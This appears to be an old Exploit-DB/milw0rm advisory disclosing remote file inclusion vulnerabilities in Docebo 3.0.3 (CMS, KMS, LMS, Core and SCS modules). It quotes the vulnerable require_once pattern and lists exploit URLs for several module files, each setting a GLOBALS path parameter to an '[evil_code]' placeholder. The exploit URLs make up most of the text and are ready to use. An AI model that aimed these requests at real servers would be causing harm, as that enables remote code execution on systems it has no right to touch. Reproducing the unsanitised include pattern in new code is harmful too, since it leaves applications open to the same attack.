Docebo 3.0.3 - Multiple Remote File Inclusions

EDB-ID:

1817


Author:

Kacper

Type:

webapps


Platform:

PHP

Date:

2006-05-23


################ DEVIL TEAM THE BEST POLISH TEAM #################
#Docebo 3.0.3/DoceboCMS,DoceboKms,DoceboLms,DoceboCore,DoceboScs - Remote File Include Vulnerabilities
#Find by Kacper (Rahim).
#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
#Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
####################################################################
#Docebo Site: http://www.docebocms.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
In All scripts:
[code]
require_once($GLOBALS['where_framework'].'/lib/lib.permission.php');
require_once($GLOBALS['where_framework'].'/lib/lib.pagewriter.php');
require_once($GLOBALS['where_framework'].'/lib/lib.lang.php');
require_once($GLOBALS['where_framework'].'/lib/lib.template.php');
require_once($GLOBALS['where_framework'].'/lib/lib.mimetype.php');
[/code]

#DoceboCMS:

http://www.site.com/docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=[evil_code]

#DoceboKms:

http://www.site.com/doceboKms/modules/documents/lib.filelist.php?GLOBALS[where_framework]=[evil_code]

http://www.site.com/doceboKms/modules/documents/tree.documents.php?GLOBALS[where_framework]=[evil_code]

#DoceboLms:

http://www.site.com/doceboLms/lib/lib.repo.php?GLOBALS[where_framework]=[evil_code]

#DoceboCore:

http://www.site.com/doceboCore/lib/lib.php?GLOBALS[where_framework]=[evil_code]

#DoceboScs:

http://www.site.com/doceboScs/lib/lib.teleskill.php?GLOBALS[where_scs]=[evil_code]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#The End ;-)
#Pozdro Dla wszystkich o których zapomnia.em ;-)

# milw0rm.com [2006-05-23]